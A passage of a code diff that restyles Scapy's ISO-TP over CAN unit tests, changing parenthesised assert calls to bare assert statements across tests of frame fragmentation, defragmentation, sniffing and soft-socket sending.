ISOTP packet with rx_id p = ISOTP(b"eee", rx_id=0x241) -assert(p.rx_id == 0x241) -assert(p.data == b"eee") -assert(bytes(p) == b"eee") +assert p.rx_id == 0x241 +assert p.data == b"eee" +assert bytes(p) == b"eee" = Creation of a simple ISOTP packet with rx_ext_address p = ISOTP(b"eee", rx_ext_address=0x41) -assert(p.rx_ext_address == 0x41) -assert(p.data == b"eee") -assert(bytes(p) == b"eee") +assert p.rx_ext_address == 0x41 +assert p.data == b"eee" +assert bytes(p) == b"eee" = Creation of a simple ISOTP packet with tx_id, rx_id, ext_address, rx_ext_address p = ISOTP(b"eee", tx_id=1, rx_id=2, ext_address=3, rx_ext_address=4) -assert(p.rx_id == 2) -assert(p.rx_ext_address == 4) -assert(p.tx_id == 1) -assert(p.ext_address == 3) -assert(p.data == b"eee") -assert(bytes(p) == b"eee") +assert p.rx_id == 2 +assert p.rx_ext_address == 4 +assert p.tx_id == 1 +assert p.ext_address == 3 +assert p.data == b"eee" +assert bytes(p) == b"eee" = ISOTP answers test p = ISOTP() r = ISOTP() -assert(p.data == b"") -assert(p.answers(r)) -assert(not p.answers(Raw())) +assert p.data == b"" +assert p.answers(r) +assert not p.answers(Raw()) = Creation of a simple ISOTP packet with tx_id validation error @@ -111,23 +111,23 @@ assert ex = Build a packet with extended addressing pkt = CAN(identifier=0x123, data=b'\x42\x10\xff\xde\xea\xdd\xaa\xaa') isotpex = ISOTPHeaderEA(bytes(pkt)) -assert(isotpex.type == 1) -assert(isotpex.message_size == 0xff) -assert(isotpex.extended_address == 0x42) -assert(isotpex.identifier == 0x123) -assert(isotpex.length == 8) +assert isotpex.type == 1 +assert isotpex.message_size == 0xff +assert isotpex.extended_address == 0x42 +assert isotpex.identifier == 0x123 +assert isotpex.length == 8 = Build a packet with normal addressing pkt = CAN(identifier=0x123, data=b'\x10\xff\xde\xea\xdd\xaa\xaa') isotpno = ISOTPHeader(bytes(pkt)) -assert(isotpno.type == 1) -assert(isotpno.message_size == 0xff) -assert(isotpno.identifier == 0x123) -assert(isotpno.length == 7) +assert isotpno.type == 1 +assert isotpno.message_size == 0xff +assert isotpno.identifier == 0x123 +assert isotpno.length == 7 = Compare both isotp payloads -assert(isotpno.data == isotpex.data) -assert(isotpno.message_size == isotpex.message_size) +assert isotpno.data == isotpex.data +assert isotpno.message_size == isotpex.message_size = Dissect multiple packets frames = \ @@ -140,138 +140,138 @@ frames = \ isotpframes = [ISOTPHeader(x) for x in frames] -assert(isotpframes[0].type == 1) -assert(isotpframes[0].message_size == 40) -assert(isotpframes[0].length == 8) -assert(isotpframes[1].type == 2) -assert(isotpframes[1].index == 1) -assert(isotpframes[1].length == 8) -assert(isotpframes[2].type == 2) -assert(isotpframes[2].index == 2) -assert(isotpframes[2].length == 8) -assert(isotpframes[3].type == 2) -assert(isotpframes[3].index == 3) -assert(isotpframes[3].length == 8) -assert(isotpframes[4].type == 2) -assert(isotpframes[4].index == 4) -assert(isotpframes[4].length == 8) -assert(isotpframes[5].type == 2) -assert(isotpframes[5].index == 5) -assert(isotpframes[5].length == 7) +assert isotpframes[0].type == 1 +assert isotpframes[0].message_size == 40 +assert isotpframes[0].length == 8 +assert isotpframes[1].type == 2 +assert isotpframes[1].index == 1 +assert isotpframes[1].length == 8 +assert isotpframes[2].type == 2 +assert isotpframes[2].index == 2 +assert isotpframes[2].length == 8 +assert isotpframes[3].type == 2 +assert isotpframes[3].index == 3 +assert isotpframes[3].length == 8 +assert isotpframes[4].type == 2 +assert isotpframes[4].index == 4 +assert isotpframes[4].length == 8 +assert isotpframes[5].type == 2 +assert isotpframes[5].index == 5 +assert isotpframes[5].length == 7 = Build SF frame with constructor, check for correct length assignments p = ISOTPHeader(bytes(ISOTPHeader()/ISOTP_SF(data=b'\xad\xbe\xad\xff'))) -assert(p.length == 5) -assert(p.message_size == 4) -assert(len(p.data) == 4) -assert(p.data == b'\xad\xbe\xad\xff') -assert(p.type == 0) -assert(p.identifier == 0) +assert p.length == 5 +assert p.message_size == 4 +assert len(p.data) == 4 +assert p.data == b'\xad\xbe\xad\xff' +assert p.type == 0 +assert p.identifier == 0 = Build SF frame EA with constructor, check for correct length assignments p = ISOTPHeaderEA(bytes(ISOTPHeaderEA()/ISOTP_SF(data=b'\xad\xbe\xad\xff'))) -assert(p.extended_address == 0) -assert(p.length == 6) -assert(p.message_size == 4) -assert(len(p.data) == 4) -assert(p.data == b'\xad\xbe\xad\xff') -assert(p.type == 0) -assert(p.identifier == 0) +assert p.extended_address == 0 +assert p.length == 6 +assert p.message_size == 4 +assert len(p.data) == 4 +assert p.data == b'\xad\xbe\xad\xff' +assert p.type == 0 +assert p.identifier == 0 = Build FF frame with constructor, check for correct length assignments p = ISOTPHeader(bytes(ISOTPHeader()/ISOTP_FF(message_size=10, data=b'\xad\xbe\xad\xff'))) -assert(p.length == 6) -assert(p.message_size == 10) -assert(len(p.data) == 4) -assert(p.data == b'\xad\xbe\xad\xff') -assert(p.type == 1) -assert(p.identifier == 0) +assert p.length == 6 +assert p.message_size == 10 +assert len(p.data) == 4 +assert p.data == b'\xad\xbe\xad\xff' +assert p.type == 1 +assert p.identifier == 0 = Build FF frame EA with constructor, check for correct length assignments p = ISOTPHeaderEA(bytes(ISOTPHeaderEA()/ISOTP_FF(message_size=10, data=b'\xad\xbe\xad\xff'))) -assert(p.extended_address == 0) -assert(p.length == 7) -assert(p.message_size == 10) -assert(len(p.data) == 4) -assert(p.data == b'\xad\xbe\xad\xff') -assert(p.type == 1) -assert(p.identifier == 0) +assert p.extended_address == 0 +assert p.length == 7 +assert p.message_size == 10 +assert len(p.data) == 4 +assert p.data == b'\xad\xbe\xad\xff' +assert p.type == 1 +assert p.identifier == 0 = Build FF frame EA, extended size, with constructor, check for correct length assignments p = ISOTPHeaderEA(bytes(ISOTPHeaderEA()/ISOTP_FF(message_size=0, extended_message_size=2000, data=b'\xad'))) -assert(p.extended_address == 0) -assert(p.length == 8) -assert(p.message_size == 0) -assert(p.extended_message_size == 2000) -assert(len(p.data) == 1) -assert(p.data == b'\xad') -assert(p.type == 1) -assert(p.identifier == 0) +assert p.extended_address == 0 +assert p.length == 8 +assert p.message_size == 0 +assert p.extended_message_size == 2000 +assert len(p.data) == 1 +assert p.data == b'\xad' +assert p.type == 1 +assert p.identifier == 0 = Build FF frame, extended size, with constructor, check for correct length assignments p = ISOTPHeader(bytes(ISOTPHeader()/ISOTP_FF(message_size=0, extended_message_size=2000, data=b'\xad'))) -assert(p.length == 7) -assert(p.message_size == 0) -assert(p.extended_message_size == 2000) -assert(len(p.data) == 1) -assert(p.data == b'\xad') -assert(p.type == 1) -assert(p.identifier == 0) +assert p.length == 7 +assert p.message_size == 0 +assert p.extended_message_size == 2000 +assert len(p.data) == 1 +assert p.data == b'\xad' +assert p.type == 1 +assert p.identifier == 0 = Build CF frame with constructor, check for correct length assignments p = ISOTPHeader(bytes(ISOTPHeader()/ISOTP_CF(data=b'\xad'))) -assert(p.length == 2) -assert(p.index == 0) -assert(len(p.data) == 1) -assert(p.data == b'\xad') -assert(p.type == 2) -assert(p.identifier == 0) +assert p.length == 2 +assert p.index == 0 +assert len(p.data) == 1 +assert p.data == b'\xad' +assert p.type == 2 +assert p.identifier == 0 = Build CF frame EA with constructor, check for correct length assignments p = ISOTPHeaderEA(bytes(ISOTPHeaderEA()/ISOTP_CF(data=b'\xad'))) -assert(p.length == 3) -assert(p.index == 0) -assert(len(p.data) == 1) -assert(p.data == b'\xad') -assert(p.type == 2) -assert(p.identifier == 0) +assert p.length == 3 +assert p.index == 0 +assert len(p.data) == 1 +assert p.data == b'\xad' +assert p.type == 2 +assert p.identifier == 0 = Build FC frame EA with constructor, check for correct length assignments p = ISOTPHeaderEA(bytes(ISOTPHeaderEA()/ISOTP_FC())) -assert(p.length == 4) -assert(p.block_size == 0) -assert(p.separation_time == 0) -assert(p.type == 3) -assert(p.identifier == 0) +assert p.length == 4 +assert p.block_size == 0 +assert p.separation_time == 0 +assert p.type == 3 +assert p.identifier == 0 = Build FC frame with constructor, check for correct length assignments p = ISOTPHeader(bytes(ISOTPHeader()/ISOTP_FC())) -assert(p.length == 3) -assert(p.block_size == 0) -assert(p.separation_time == 0) -assert(p.type == 3) -assert(p.identifier == 0) +assert p.length == 3 +assert p.block_size == 0 +assert p.separation_time == 0 +assert p.type == 3 +assert p.identifier == 0 = Construct some single frames p = ISOTPHeader(identifier=0x123, length=5)/ISOTP_SF(message_size=4, data=b'abcd') -assert(p.length == 5) -assert(p.identifier == 0x123) -assert(p.type == 0) -assert(p.message_size == 4) -assert(p.data == b'abcd') +assert p.length == 5 +assert p.identifier == 0x123 +assert p.type == 0 +assert p.message_size == 4 +assert p.data == b'abcd' = Construct some single frames EA p = ISOTPHeaderEA(identifier=0x123, length=6, extended_address=42)/ISOTP_SF(message_size=4, data=b'abcd') -assert(p.length == 6) -assert(p.extended_address == 42) -assert(p.identifier == 0x123) -assert(p.type == 0) -assert(p.message_size == 4) -assert(p.data == b'abcd') +assert p.length == 6 +assert p.extended_address == 42 +assert p.identifier == 0x123 +assert p.type == 0 +assert p.message_size == 4 +assert p.data == b'abcd' = Construct ISOTP_packet with extended can frame p = get_isotp_packet(identifier=0x1234, extended=False, extended_can_id=True) @@ -289,100 +289,100 @@ assert (p.flags == "extended") = Fragment an empty ISOTP message fragments = ISOTP().fragment() -assert(len(fragments) == 1) -assert(fragments[0].data == b"\0") +assert len(fragments) == 1 +assert fragments[0].data == b"\0" = Fragment another empty ISOTP message fragments = ISOTP(b"").fragment() -assert(len(fragments) == 1) -assert(fragments[0].data == b"\0") +assert len(fragments) == 1 +assert fragments[0].data == b"\0" = Fragment a 4 bytes long ISOTP message fragments = ISOTP(b"data", tx_id=0x241).fragment() -assert(len(fragments) == 1) -assert(isinstance(fragments[0], CAN)) +assert len(fragments) == 1 +assert isinstance(fragments[0], CAN) fragment = CAN(bytes(fragments[0])) -assert(fragment.data == b"\x04data") -assert(fragment.flags == 0) -assert(fragment.length == 5) -assert(fragment.reserved == 0) +assert fragment.data == b"\x04data" +assert fragment.flags == 0 +assert fragment.length == 5 +assert fragment.reserved == 0 = Fragment a 4 bytes long ISOTP message extended fragments = ISOTP(b"data", rx_id=0x1fff0000).fragment() -assert(len(fragments) == 1) -assert(isinstance(fragments[0], CAN)) +assert len(fragments) == 1 +assert isinstance(fragments[0], CAN) fragment = CAN(bytes(fragments[0])) -assert(fragment.data == b"\x04data") -assert(fragment.length == 5) -assert(fragment.reserved == 0) -assert(fragment.flags == 4) +assert fragment.data == b"\x04data" +assert fragment.length == 5 +assert fragment.reserved == 0 +assert fragment.flags == 4 = Fragment a 8 bytes long ISOTP message extended fragments = ISOTP(b"datadata", rx_id=0x1fff0000).fragment() -assert(len(fragments) == 2) -assert(isinstance(fragments[0], CAN)) +assert len(fragments) == 2 +assert isinstance(fragments[0], CAN) fragment = CAN(bytes(fragments[0])) -assert(fragment.data == b"\x10\x08datada") -assert(fragment.length == 8) -assert(fragment.reserved == 0) -assert(fragment.flags == 4) +assert fragment.data == b"\x10\x08datada" +assert fragment.length == 8 +assert fragment.reserved == 0 +assert fragment.flags == 4 fragment = CAN(bytes(fragments[1])) -assert(fragment.data == b"\x21ta") -assert(fragment.length == 3) -assert(fragment.reserved == 0) -assert(fragment.flags == 4) +assert fragment.data == b"\x21ta" +assert fragment.length == 3 +assert fragment.reserved == 0 +assert fragment.flags == 4 = Fragment a 7 bytes long ISOTP message fragments = ISOTP(b"abcdefg").fragment() -assert(len(fragments) == 1) -assert(fragments[0].data == b"\x07abcdefg") +assert len(fragments) == 1 +assert fragments[0].data == b"\x07abcdefg" = Fragment a 8 bytes long ISOTP message fragments = ISOTP(b"abcdefgh").fragment() -assert(len(fragments) == 2) -assert(fragments[0].data == b"\x10\x08abcdef") -assert(fragments[1].data == b"\x21gh") +assert len(fragments) == 2 +assert fragments[0].data == b"\x10\x08abcdef" +assert fragments[1].data == b"\x21gh" = Fragment an ISOTP message with extended addressing isotp = ISOTP(b"abcdef", rx_ext_address=ord('A')) fragments = isotp.fragment() -assert(len(fragments) == 1) -assert(fragments[0].data == b"A\x06abcdef") +assert len(fragments) == 1 +assert fragments[0].data == b"A\x06abcdef" = Fragment a 7 bytes ISOTP message with destination identifier isotp = ISOTP(b"abcdefg", rx_id=0x64f) fragments = isotp.fragment() -assert(len(fragments) == 1) -assert(fragments[0].data == b"\x07abcdefg") -assert(fragments[0].identifier == 0x64f) +assert len(fragments) == 1 +assert fragments[0].data == b"\x07abcdefg" +assert fragments[0].identifier == 0x64f = Fragment a 16 bytes ISOTP message with extended addressing isotp = ISOTP(b"abcdefghijklmnop", rx_id=0x64f, rx_ext_address=ord('A')) fragments = isotp.fragment() -assert(len(fragments) == 3) -assert(fragments[0].data == b"A\x10\x10abcde") -assert(fragments[1].data == b"A\x21fghijk") -assert(fragments[2].data == b"A\x22lmnop") -assert(fragments[0].identifier == 0x64f) -assert(fragments[1].identifier == 0x64f) -assert(fragments[2].identifier == 0x64f) +assert len(fragments) == 3 +assert fragments[0].data == b"A\x10\x10abcde" +assert fragments[1].data == b"A\x21fghijk" +assert fragments[2].data == b"A\x22lmnop" +assert fragments[0].identifier == 0x64f +assert fragments[1].identifier == 0x64f +assert fragments[2].identifier == 0x64f = Fragment a huge ISOTP message, 4997 bytes long data = b"T" * 4997 isotp = ISOTP(b"T" * 4997, rx_id=0x345) fragments = isotp.fragment() -assert(len(fragments) == 715) -assert(fragments[0].data == dhex("10 00 00 00 13 85") + b"TT") -assert(fragments[1].data == b"\x21TTTTTTT") -assert(fragments[-2].data == b"\x29TTTTTTT") -assert(fragments[-1].data == b"\x2ATTTT") +assert len(fragments) == 715 +assert fragments[0].data == dhex("10 00 00 00 13 85") + b"TT" +assert fragments[1].data == b"\x21TTTTTTT" +assert fragments[-2].data == b"\x29TTTTTTT" +assert fragments[-1].data == b"\x2ATTTT" = Defragment a single-frame ISOTP message fragments = [CAN(identifier=0x641, data=b"\x04test")] isotp = ISOTP.defragment(fragments) isotp.show() -assert(isotp.data == b"test") -assert(isotp.rx_id == 0x641) +assert isotp.data == b"test" +assert isotp.rx_id == 0x641 = Defragment non ISOTP message fragments = [CAN(identifier=0x641, data=b"\xa4test")] @@ -392,8 +392,8 @@ assert isotp is None = Defragment ISOTP message with warning fragments = [CAN(identifier=0x641, data=b"\x04test"), CAN(identifier=0x642, data=b"\x04test")] isotp = ISOTP.defragment(fragments) -assert(isotp.data == b"test") -assert(isotp.rx_id == 0x641) +assert isotp.data == b"test" +assert isotp.rx_id == 0x641 = Defragment exception fragments = [] @@ -425,43 +425,43 @@ fragments = [ ] isotp = ISOTP.defragment(fragments) isotp.show() -assert(isotp.data == dhex("61 62 63 64 65 66 67 68 69 6A 6B 6C 6D 6E 6F 70")) -assert(isotp.rx_id == 0x641) -assert(isotp.rx_ext_address == 0x41) +assert isotp.data == dhex("61 62 63 64 65 66 67 68 69 6A 6B 6C 6D 6E 6F 70") +assert isotp.rx_id == 0x641 +assert isotp.rx_ext_address == 0x41 = Check if fragmenting a message and defragmenting it back yields the original message isotp1 = ISOTP(b"abcdef", rx_ext_address=ord('A')) fragments = isotp1.fragment() isotp2 = ISOTP.defragment(fragments) isotp2.show() -assert(isotp1 == isotp2) +assert isotp1 == isotp2 isotp1 = ISOTP(b"abcdefghijklmnop") fragments = isotp1.fragment() isotp2 = ISOTP.defragment(fragments) isotp2.show() -assert(isotp1 == isotp2) +assert isotp1 == isotp2 isotp1 = ISOTP(b"abcdefghijklmnop", rx_ext_address=ord('A')) fragments = isotp1.fragment() isotp2 = ISOTP.defragment(fragments) isotp2.show() -assert(isotp1 == isotp2) +assert isotp1 == isotp2 isotp1 = ISOTP(b"T"*5000, rx_ext_address=ord('A')) fragments = isotp1.fragment() isotp2 = ISOTP.defragment(fragments) isotp2.show() -assert(isotp1 == isotp2) +assert isotp1 == isotp2 = Defragment an ambiguous CAN frame fragments = [CAN(identifier=0x641, data=dhex("02 01 AA"))] isotp = ISOTP.defragment(fragments, False) isotp.show() -assert(isotp.data == dhex("01 AA")) -assert(isotp.rx_ext_address == None) +assert isotp.data == dhex("01 AA") +assert isotp.rx_ext_address == None isotpex = ISOTP.defragment(fragments, True) isotpex.show() -assert(isotpex.data == dhex("AA")) -assert(isotpex.rx_ext_address == 0x02) +assert isotpex.data == dhex("AA") +assert isotpex.rx_ext_address == 0x02 diff --git a/test/contrib/isotp_soft_socket.uts b/test/contrib/isotp_soft_socket.uts index 25406776d75..655f2a903a5 100644 --- a/test/contrib/isotp_soft_socket.uts +++ b/test/contrib/isotp_soft_socket.uts @@ -57,10 +57,10 @@ with TestSocket(CAN) as s, TestSocket(CAN) as tx_sock: sniffed = sniff(opened_socket=s, session=ISOTPSession, timeout=1, count=1) assert sniffed[0]['ISOTP'].data == bytearray(range(1, 0x29)) -assert(sniffed[0]['ISOTP'].tx_id == 0x641) -assert(sniffed[0]['ISOTP'].ext_address is 0xEA) -assert(sniffed[0]['ISOTP'].rx_id == 0x241) -assert(sniffed[0]['ISOTP'].rx_ext_address is 0xEA) +assert sniffed[0]['ISOTP'].tx_id == 0x641 +assert sniffed[0]['ISOTP'].ext_address is 0xEA +assert sniffed[0]['ISOTP'].rx_id == 0x241 +assert sniffed[0]['ISOTP'].rx_ext_address is 0xEA + ISOTPSoftSocket tests @@ -74,7 +74,7 @@ with TestSocket(CAN) as cans, TestSocket(CAN) as stim, ISOTPSoftSocket(cans, tx_ s.failure_analysis() raise Scapy_Exception("ERROR") msg = pkts[0] - assert(msg.data == dhex("01 02 03 04 05")) + assert msg.data == dhex("01 02 03 04 05") = Single-frame send @@ -86,7 +86,7 @@ with TestSocket(CAN) as cans, TestSocket(CAN) as stim, ISOTPSoftSocket(cans, tx_ s.failure_analysis() raise Scapy_Exception("ERROR") msg = pkts[0] - assert(msg.data == dhex("05 01 02 03 04 05")) + assert msg.data == dhex("05 01 02 03 04 05") = Two frame receive @@ -105,7 +105,7 @@ with TestSocket(CAN) as cans, TestSocket(CAN) as stim, ISOTPSoftSocket(cans, tx_ s.failure_analysis() raise Scapy_Exception("ERROR") msg = pkts[0] - assert(msg.data == dhex("01 02 03 04 05 06 07 08 09")) + assert msg.data == dhex("01 02 03 04 05 06 07 08 09") = 20000 bytes receive @@ -125,7 +125,7 @@ def test(): msgs = s.sniff(count=1, timeout=30) print(msgs) msg = msgs[0] - assert(msg.data == data) + assert msg.data == data test() @@ -159,19 +159,19 @@ with TestSocket(CAN) as cans, TestSocket(CAN) as stim, ISOTPSoftSocket(cans, tx_ with ISOTPSoftSocket(TestSocket(CAN), tx_id=0x641, rx_id=0x241) as s: s.ins.on_recv(CAN(identifier=0x241, data=dhex("05 01 02 03 04 05"))) msg, ts = s.ins.rx_queue.recv() - assert(msg == dhex("01 02 03 04 05")) + assert msg == dhex("01 02 03 04 05") = Test on_recv function with empty frame with ISOTPSoftSocket(TestSocket(CAN), tx_id=0x641, rx_id=0x241) as s: s.ins.on_recv(CAN(identifier=0x241, data=b"")) - assert(s.ins.rx_queue.empty()) + assert s.ins.rx_queue.empty() = Test on_recv function with single frame and extended addressing with ISOTPSoftSocket(TestSocket(CAN), tx_id=0x641, rx_id=0x241, rx_ext_address=0xea) as s: cf = CAN(identifier=0x241, data=dhex("EA 05 01 02 03 04 05")) s.ins.on_recv(cf) msg, ts = s.ins.rx_queue.recv() - assert(msg == dhex("01 02 03 04 05")) + assert msg == dhex("01 02 03 04 05") assert ts == cf.time = CF is sent when first frame is received @@ -181,8 +181,8 @@ cans.pair(can_out) with ISOTPSoftSocket(cans, tx_id=0x641, rx_id=0x241) as s: s.ins.on_recv(CAN(identifier=0x241, data=dhex("10 20 01 02 03 04 05 06"))) can = can_out.sniff(timeout=1, count=1)[0] - assert(can.identifier == 0x641) - assert(can.data == dhex("30 00 00")) + assert can.identifier == 0x641 + assert can.data == dhex("30 00 00") cans.close() can_out.close() @@ -194,10 +194,10 @@ with TestSocket(CAN) as ss, TestSocket(CAN) as sr: ss.pair(sr) tx_func = lambda: ss.send(CAN(identifier=0x111, data=b"\x01\x23\x45\x67")) p = sr.sniff(count=1, timeout=0.2, started_callback=tx_func) - assert(len(p)==1) + assert len(p)==1 tx_func = lambda: ss.send(CAN(identifier=0x111, data=b"\x89\xab\xcd\xef")) p = sr.sniff(count=1, timeout=0.2, started_callback=tx_func) - assert(len(p)==1) + assert len(p)==1 = Send single frame ISOTP message, using send with TestSocket(CAN) as isocan, \ @@ -205,8 +205,8 @@ with TestSocket(CAN) as isocan, \ TestSocket(CAN) as cans: cans.pair(isocan) can = cans.sniff(timeout=2, count=1, started_callback=lambda: s.send(ISOTP(data=dhex("01 02 03 04 05")))) - assert(can[0].identifier == 0x641) - assert(can[0].data == dhex("05 01 02 03 04 05")) + assert can[0].identifier == 0x641 + assert can[0].data == dhex("05 01 02 03 04 05") = Send many single frame ISOTP messages, using send @@ -218,9 +218,9 @@ with TestSocket(CAN) as isocan, \ data = dhex("01 02 03 04 05") + struct.pack("B", i) expected = struct.pack("B", len(data)) + data can = cans.sniff(timeout=4, count=1, started_callback=lambda: s.send(ISOTP(data=data))) - assert(can[0].identifier == 0x641) + assert can[0].identifier == 0x641 print(can[0].data, data) - assert(can[0].data == expected) + assert can[0].data == expected = Send two-frame ISOTP message, using send @@ -238,8 +238,8 @@ with TestSocket(CAN) as cans, TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, cans.pair(isocan) s.send(ISOTP(data=dhex("01 02 03 04 05"))) can = cans.sniff(timeout=1, count=1) - assert(can[0].identifier == 0x641) - assert(can[0].data == dhex("05 01 02 03 04 05")) + assert can[0].identifier == 0x641 + assert can[0].data == dhex("05 01 02 03 04 05") = Send two-frame ISOTP message @@ -266,22 +266,22 @@ with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, tx_id=0x641, rx_id=0x241 s.failure_analysis() raise Scapy_Exception("ERROR") can = pkts[0] - assert(can.identifier == 0x641) - assert(can.data == dhex("10 08 01 02 03 04 05 06")) + assert can.identifier == 0x641 + assert can.data == dhex("10 08 01 02 03 04 05 06") pkts = cans.sniff(timeout=1, count=1) if not len(pkts): s.failure_analysis() raise Scapy_Exception("ERROR") can = pkts[0] - assert(can.identifier == 0x241) - assert(can.data == dhex("30 00 00")) + assert can.identifier == 0x241 + assert can.data == dhex("30 00 00") pkts = cans.sniff(timeout=1, count=1) if not len(pkts): s.failure_analysis() raise Scapy_Exception("ERROR") can = pkts[0] - assert(can.identifier == 0x641) - assert(can.data == dhex("21 07 08")) + assert can.identifier == 0x641 + assert can.data == dhex("21 07 08") thread.join(15) acks.close() @@ -310,22 +310,22 @@ with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, tx_id=0x641, rx_id=0x241 s.failure_analysis() raise Scapy_Exception("ERROR") can = pkts[0] - assert(can.identifier == 0x641) - assert(can.data == dhex("10 08 01 02 03 04 05 06")) + assert can.identifier == 0x641 + assert can.data == dhex("10 08 01 02 03 04 05 06") pkts = cans.sniff(timeout=1, count=1) if not len(pkts): s.failure_analysis() raise Scapy_Exception("ERROR") can = pkts[0] - assert(can.identifier == 0x241) - assert(can.data == dhex("30 20 00")) + assert can.identifier == 0x241 + assert can.data == dhex("30 20 00") pkts = cans.sniff(timeout=1, count=1) if not len(pkts): s.failure_analysis() raise Scapy_Exception("ERROR") can = pkts[0] - assert(can.identifier == 0x641) - assert(can.data == dhex("21 07 08")) + assert can.identifier == 0x641 + assert can.data == dhex("21 07 08") thread.join(15) acks.close() @@ -353,22 +353,22 @@ with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, tx_id=0x641, rx_id=0x241 s.failure_analysis() raise Scapy_Exception("ERROR") can = pkts[0] - assert(can.identifier == 0x641) - assert(can.data == dhex("10 08 01 02 03 04 05 06")) + assert can.identifier == 0x641 + assert can.data == dhex("10 08 01 02 03 04 05 06") pkts = cans.sniff(timeout=1, count=1) if not len(pkts): s.failure_analysis() raise Scapy_Exception("ERROR") can = pkts[0] - assert(can.identifier == 0x241) - assert(can.data == dhex("30 00 10")) + assert can.identifier == 0x241 + assert can.data == dhex("30 00 10") pkts = cans.sniff(timeout=1, count=1) if not len(pkts): s.failure_analysis() raise Scapy_Exception("ERROR") can = pkts[0] - assert(can.identifier == 0x641) - assert(can.data == dhex("21 07 08")) + assert can.identifier == 0x641 + assert can.data == dhex("21 07 08") thread.join(15) acks.close() @@ -384,11 +384,11 @@ with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, tx_id=0x641, rx_id=0x241 s.failure_analysis() raise Scapy_Exception("ERROR") isotp = pkts[0] - assert(isotp.data == dhex("01 02 03 04 05")) - assert(isotp.tx_id == 0x641) - assert(isotp.rx_id == 0x241) - assert(isotp.ext_address == None) - assert(isotp.rx_ext_address == None) + assert isotp.data == dhex("01 02 03 04 05") + assert isotp.tx_id == 0x641 + assert isotp.rx_id == 0x241 + assert isotp.ext_address == None + assert isotp.rx_ext_address == None = Receive a single frame ISOTP message, with extended addressing @@ -401,11 +401,11 @@ with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, tx_id=0x641, rx_id=0x241 s.failure_analysis() raise Scapy_Exception("ERROR") isotp = pkts[0] - assert(isotp.data == dhex("01 02 03 04 05")) - assert(isotp.tx_id == 0x641) - assert(isotp.rx_id == 0x241) - assert(isotp.ext_address == 0xc0) - assert(isotp.rx_ext_address == 0xea) + assert isotp.data == dhex("01 02 03 04 05") + assert isotp.tx_id == 0x641 + assert isotp.rx_id == 0x241 + assert isotp.ext_address == 0xc0 + assert isotp.rx_ext_address == 0xea = Receive frames from CandumpReader @@ -431,7 +431,7 @@ candump_fd = BytesIO(b''' vcan0 541 [8] 10 0A DE AD BE EF AA AA with ISOTPSoftSocket(CandumpReader(candump_fd), tx_id=0x241, rx_id=0x541, listen_only=True) as s: pkts = s.sniff(timeout=2, count=6) - assert(len(pkts) == 6) + assert len(pkts) == 6 if not len(pkts): s.failure_analysis() raise Scapy_Exception("ERROR") @@ -439,9 +439,9 @@ with ISOTPSoftSocket(CandumpReader(candump_fd), tx_id=0x241, rx_id=0x541, listen print(repr(isotp)) print(hex(isotp.tx_id)) print(hex(isotp.rx_id)) - assert(isotp.data == dhex("DE AD BE EF AA AA AA AA AA AA")) - assert(isotp.tx_id == 0x241) - assert(isotp.rx_id == 0x541) + assert isotp.data == dhex("DE AD BE EF AA AA AA AA AA AA") + assert isotp.tx_id == 0x241 + assert isotp.rx_id == 0x541 = Receive frames from CandumpReader with ISOTPSniffer without extended addressing candump_fd = BytesIO(b''' vcan0 541 [8] 10 0A DE AD BE EF AA AA @@ -465,14 +465,14 @@ candump_fd = BytesIO(b''' vcan0 541 [8] 10 0A DE AD BE EF AA AA vcan0 541 [5] 21 AA AA AA AA''') pkts = sniff(opened_socket=CandumpReader(candump_fd), session=ISOTPSession, timeout=1, session_kwargs={"use_ext_address": False}) -assert(len(pkts) == 6) +assert len(pkts) == 6 if not len(pkts): s.failure_analysis() raise Scapy_Exception("ERROR") isotp = pkts[0] -assert(isotp.data == dhex("DE AD BE EF AA AA AA AA AA AA")) +assert isotp.data == dhex("DE AD BE EF AA AA AA AA AA AA") assert (isotp.rx_id == 0x541) = Receive frames from CandumpReader with ISOTPSniffer @@ -503,12 +503,12 @@ if not len(pkts): s.failure_analysis() raise Scapy_Exception("ERROR") -assert(len(pkts) == 12) +assert len(pkts) == 12 isotp = pkts[1] -assert(isotp.data == dhex("DE AD BE EF AA AA AA AA AA AA")) +assert isotp.data == dhex("DE AD BE EF AA AA AA AA AA AA") assert (isotp.rx_id == 0x541) isotp = pkts[0] -assert(isotp.data == dhex("")) +assert isotp.data == dhex("") assert (isotp.rx_id == 0x241) = Receive frames from CandumpReader with ISOTPSniffer and count @@ -539,12 +539,12 @@ if not len(pkts): s.failure_analysis() raise Scapy_Exception("ERROR") -assert(len(pkts) == 2) +assert len(pkts) == 2 isotp = pkts[1] -assert(isotp.data == dhex("DE AD BE EF AA AA AA AA AA AA")) +assert isotp.data == dhex("DE AD BE EF AA AA AA AA AA AA") assert (isotp.rx_id == 0x541) isotp = pkts[0] -assert(isotp.data == dhex("")) +assert isotp.data == dhex("") assert (isotp.rx_id == 0x241) = ISOTPSession tests @@ -565,14 +565,14 @@ with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, tx_id=0x641, rx_id=0x241 s.failure_analysis() raise Scapy_Exception("ERROR") isotp = pkts[0] - assert(isotp.data == dhex("01 02 03 04 05 06 07 08 09 10 11")) + assert isotp.data == dhex("01 02 03 04 05 06 07 08 09 10 11") = Check what happens when a CAN frame with wrong identifier gets received with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, tx_id=0x641, rx_id=0x241) as s, TestSocket(CAN) as cans: cans.pair(isocan) cans.send(CAN(identifier = 0x141, data = dhex("05 01 02 03 04 05"))) - assert(s.ins.rx_queue.empty()) + assert s.ins.rx_queue.empty() + Testing ISOTPSoftSocket timeouts @@ -583,7 +583,7 @@ with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, tx_id=0x641, rx_id=0x241 cans.send(CAN(identifier = 0x241, data = dhex("21 07 08 09 0A 0B 0C 0D"))) isotp = s.sniff(timeout=0.1) -assert(len(isotp) == 0) +assert len(isotp) == 0 = Check if not sending the first CF will make the socket timeout @@ -592,7 +592,7 @@ with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, tx_id=0x641, rx_id=0x241 cans.send(CAN(identifier = 0x241, data = dhex("10 11 01 02 03 04 05 06"))) isotp = s.sniff(timeout=0.1) -assert(len(isotp) == 0) +assert len(isotp) == 0 = Check if not sending the first FC will make the socket timeout @@ -670,9 +670,9 @@ with 